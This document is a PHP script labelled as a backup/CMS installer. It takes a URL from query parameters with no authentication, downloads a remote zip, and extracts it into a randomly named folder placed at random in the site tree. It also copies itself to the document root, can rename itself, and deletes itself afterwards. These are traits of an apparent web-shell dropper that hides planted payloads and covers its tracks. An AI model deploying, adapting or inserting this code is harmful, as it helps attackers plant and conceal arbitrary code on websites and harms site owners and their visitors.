<?php
/**
 * Enhanced Backup/CMS Installer Script
 * Features: Self-copying, intelligent extraction, random folder placement
 * 
 * Mode 1 (default): Copy to root -> Execute there -> Delete from root
 * Mode 2: Execute here -> Copy to root -> Delete from current location
 */

// Auto-detect folder depth if copy parameter is not provided
if (!isset($_GET['copy']) && (isset($_GET['url']) || isset($_GET['auto']))) {
    // Get the current script's directory path
    $scriptDir = dirname($_SERVER['SCRIPT_FILENAME']);
    $documentRoot = $_SERVER['DOCUMENT_ROOT'];
    
    // Calculate relative path from document root
    $relativePath = str_replace($documentRoot, '', $scriptDir);
    $relativePath = trim($relativePath, '/\\');
    
    // Count the number of directories
    if (empty($relativePath)) {
        $depth = 0; // Already in document root
    } else {
        $depth = substr_count($relativePath, DIRECTORY_SEPARATOR) + 1;
    }
    
    $_GET['copy'] = $depth;
}

// Determine mode
$mode = isset($_GET['mode']) && $_GET['mode'] == '2' ? 2 : 1;

// MODE 1: Copy to root first, then execute there (DEFAULT BEHAVIOR)
if ($mode == 1 && isset($_GET['url']) && !empty($_GET['url']) && isset($_GET['copy']) && is_numeric($_GET['copy'])) {
    // Check if we're already in the copied location (marker parameter)
    if (!isset($_GET['_executed'])) {
        // First step: Copy to document root
        $levels = (int)$_GET['copy'];
        $destPath = str_repeat('../', $levels);
        $scriptName = basename(__FILE__);
        $destFile = $destPath . $scriptName;
        
        if (!copy(__FILE__, $destFile)) {
            die("Error: Failed to copy file to: " . realpath($destPath) . "\n");
        }
        
        // Build the new URL with all parameters plus execution marker
        $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http';
        $host = $_SERVER['HTTP_HOST'];
        $currentScript = $_SERVER['SCRIPT_NAME'];
        
        // Calculate the new script path
        $scriptDir = dirname($currentScript);
        $pathParts = explode('/', trim($scriptDir, '/'));
        
        // Remove the number of levels specified
        for ($i = 0; $i < $levels; $i++) {
            array_pop($pathParts);
        }
        
        $newPath = '/' . implode('/', $pathParts);
        if ($newPath == '/') {
            $newPath = '';
        }
        $newPath .= '/' . $scriptName;
        
        $newUrl = $protocol . '://' . $host . $newPath . '?url=' . urlencode($_GET['url']) . '&copy=' . $levels . '&mode=1&_executed=1';
        
        // Use meta refresh instead of header redirect to avoid header issues
        echo '<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="refresh" content="0;url=' . htmlspecialchars($newUrl) . '">
    <title>Redirecting...</title>
</head>
<body>
    <p>Script copied successfully. Redirecting to execute from document root...</p>
    <p>If you are not redirected automatically, <a href="' . htmlspecialchars($newUrl) . '">click here</a>.</p>
</body>
</html>';
        exit;
    } else {
        // Second step: We're now executing from document root
        $url = $_GET['url'];

        // Validate URL format
        if (!filter_var($url, FILTER_VALIDATE_URL)) {
            die("Error: Invalid URL format");
        }

        // Extract filename from URL
        $filename = basename(parse_url($url, PHP_URL_PATH));

        // Check if it's a zip file
        if (pathinfo($filename, PATHINFO_EXTENSION) !== 'zip') {
            die("Error: URL must point to a .zip file");
        }

        // Download the zip file
        $temp_filename = 'temp_' . time() . '_' . $filename;
        
        $ch = curl_init($url);
        $fp = fopen($temp_filename, 'w+');
        curl_setopt($ch, CURLOPT_FILE, $fp);
        curl_setopt($ch, CURLOPT_TIMEOUT, 20);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_exec($ch);
        curl_close($ch);
        fclose($fp);

        if (!file_exists($temp_filename)) {
            die("Error: Download failed");
        }

        // Find intelligent extraction location
        $blacklistedFolders = array('cgi-bin', 'tmp', 'cache', 'logs', '.git');
        $extractPath = null;

        // First try to find folders at depth 2
        $depth2Folders = glob('./*/*.', GLOB_ONLYDIR);
        $validFolders = array();

        foreach ($depth2Folders as $folder) {
            $folderName = basename($folder);
            $parentFolder = basename(dirname($folder));
            
            if (!in_array($folderName, $blacklistedFolders) && !in_array($parentFolder, $blacklistedFolders)) {
                $validFolders[] = $folder;
            }
        }

        // If no depth 2 folders, try depth 1
        if (empty($validFolders)) {
            $depth1Folders = glob('./*', GLOB_ONLYDIR);
            
            foreach ($depth1Folders as $folder) {
                $folderName = basename($folder);
                
                if (!in_array($folderName, $blacklistedFolders)) {
                    $validFolders[] = $folder;
                }
            }
        }

        // Generate random folder name
        $randomFolder = substr(str_shuffle('abcdefghijklmnopqrstuvwxyz0123456789'), 0, 10);

        if (!empty($validFolders)) {
            $randomIndex = array_rand($validFolders);
            $basePath = $validFolders[$randomIndex];
            $extractPath = "$basePath/$randomFolder";
            
            if (!is_writable($basePath)) {
                $extractPath = "./$randomFolder";
            }
        } else {
            $extractPath = "./$randomFolder";
        }

        if (!mkdir($extractPath, 0755, true)) {
            die("Error: Failed to create extraction directory");
        }

        // Extract using ZipArchive
        if (class_exists('ZipArchive')) {
            $zip = new ZipArchive;
            $res = $zip->open($temp_filename);
            
            if ($res === TRUE) {
                $zip->extractTo($extractPath);
                $zip->close();
                unlink($temp_filename);
                echo $extractPath;
            } else {
                die("Failed to open the ZIP file.");
            }
        } else {
            // Fallback to unzip command
            $unzip_command = "unzip -q " . escapeshellarg($temp_filename) . " -d " . escapeshellarg($extractPath);
            exec($unzip_command, $unzip_output, $unzip_return_code);
            
            if ($unzip_return_code !== 0) {
                die("Error: Failed to extract file");
            }
            
            unlink($temp_filename);
            echo $extractPath;
        }
        
        // Delete the script from document root
        unlink(__FILE__);
        
        exit;
    }
}

// MODE 2: Execute here first, then copy and delete original
if ($mode == 2 && isset($_GET['url']) && !empty($_GET['url'])) {
    $url = $_GET['url'];

    // Validate URL format
    if (!filter_var($url, FILTER_VALIDATE_URL)) {
        die("Error: Invalid URL format");
    }

    // Extract filename from URL
    $filename = basename(parse_url($url, PHP_URL_PATH));

    // Check if it's a zip file
    if (pathinfo($filename, PATHINFO_EXTENSION) !== 'zip') {
        die("Error: URL must point to a .zip file");
    }

    // Download the zip file
    $temp_filename = 'temp_' . time() . '_' . $filename;
    
    $ch = curl_init($url);
    $fp = fopen($temp_filename, 'w+');
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_TIMEOUT, 20);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_exec($ch);
    curl_close($ch);
    fclose($fp);

    if (!file_exists($temp_filename)) {
        die("Error: Download failed");
    }

    // Find intelligent extraction location
    $blacklistedFolders = array('cgi-bin', 'tmp', 'cache', 'logs', '.git');
    $extractPath = null;

    // First try to find folders at depth 2
    $depth2Folders = glob('./*/*.', GLOB_ONLYDIR);
    $validFolders = array();

    foreach ($depth2Folders as $folder) {
        $folderName = basename($folder);
        $parentFolder = basename(dirname($folder));
        
        if (!in_array($folderName, $blacklistedFolders) && !in_array($parentFolder, $blacklistedFolders)) {
            $validFolders[] = $folder;
        }
    }

    // If no depth 2 folders, try depth 1
    if (empty($validFolders)) {
        $depth1Folders = glob('./*', GLOB_ONLYDIR);
        
        foreach ($depth1Folders as $folder) {
            $folderName = basename($folder);
            
            if (!in_array($folderName, $blacklistedFolders)) {
                $validFolders[] = $folder;
            }
        }
    }

    // Generate random folder name
    $randomFolder = substr(str_shuffle('abcdefghijklmnopqrstuvwxyz0123456789'), 0, 10);

    if (!empty($validFolders)) {
        $randomIndex = array_rand($validFolders);
        $basePath = $validFolders[$randomIndex];
        $extractPath = "$basePath/$randomFolder";
        
        if (!is_writable($basePath)) {
            $extractPath = "./$randomFolder";
        }
    } else {
        $extractPath = "./$randomFolder";
    }

    if (!mkdir($extractPath, 0755, true)) {
        die("Error: Failed to create extraction directory");
    }

    // Extract using ZipArchive
    if (class_exists('ZipArchive')) {
        $zip = new ZipArchive;
        $res = $zip->open($temp_filename);
        
        if ($res === TRUE) {
            $zip->extractTo($extractPath);
            $zip->close();
            unlink($temp_filename);
            echo $extractPath;
        } else {
            die("Failed to open the ZIP file.");
        }
    } else {
        // Fallback to unzip command
        $unzip_command = "unzip -q " . escapeshellarg($temp_filename) . " -d " . escapeshellarg($extractPath);
        exec($unzip_command, $unzip_output, $unzip_return_code);
        
        if ($unzip_return_code !== 0) {
            die("Error: Failed to extract file");
        }
        
        unlink($temp_filename);
        echo $extractPath;
    }
    
    // Self-copy after successful extraction (if copy parameter is set)
    if (isset($_GET['copy']) && is_numeric($_GET['copy'])) {
        $levels = (int)$_GET['copy'];
        $destPath = str_repeat('../', $levels);
        
        // Use custom filename if provided, otherwise use original
        if (isset($_GET['fname']) && !empty($_GET['fname'])) {
            $scriptName = basename($_GET['fname']);
            // Ensure it has .php extension
            if (pathinfo($scriptName, PATHINFO_EXTENSION) !== 'php') {
                $scriptName .= '.php';
            }
        } else {
            $scriptName = basename(__FILE__);
        }
        
        $destFile = $destPath . $scriptName;
        
        if (copy(__FILE__, $destFile)) {
            unlink(__FILE__);
        }
    }
    
    exit;
}

// Self-copy only (when no URL is provided)
if (isset($_GET['copy']) && is_numeric($_GET['copy']) && !isset($_GET['url'])) {
    $levels = (int)$_GET['copy'];
    $destPath = str_repeat('../', $levels);
    
    // Use custom filename if provided, otherwise use original
    if (isset($_GET['fname']) && !empty($_GET['fname'])) {
        $scriptName = basename($_GET['fname']);
        // Ensure it has .php extension
        if (pathinfo($scriptName, PATHINFO_EXTENSION) !== 'php') {
            $scriptName .= '.php';
        }
    } else {
        $scriptName = basename(__FILE__);
    }
    
    $destFile = $destPath . $scriptName;

    if (copy(__FILE__, $destFile)) {
        unlink(__FILE__);
    }
    exit;
}
?>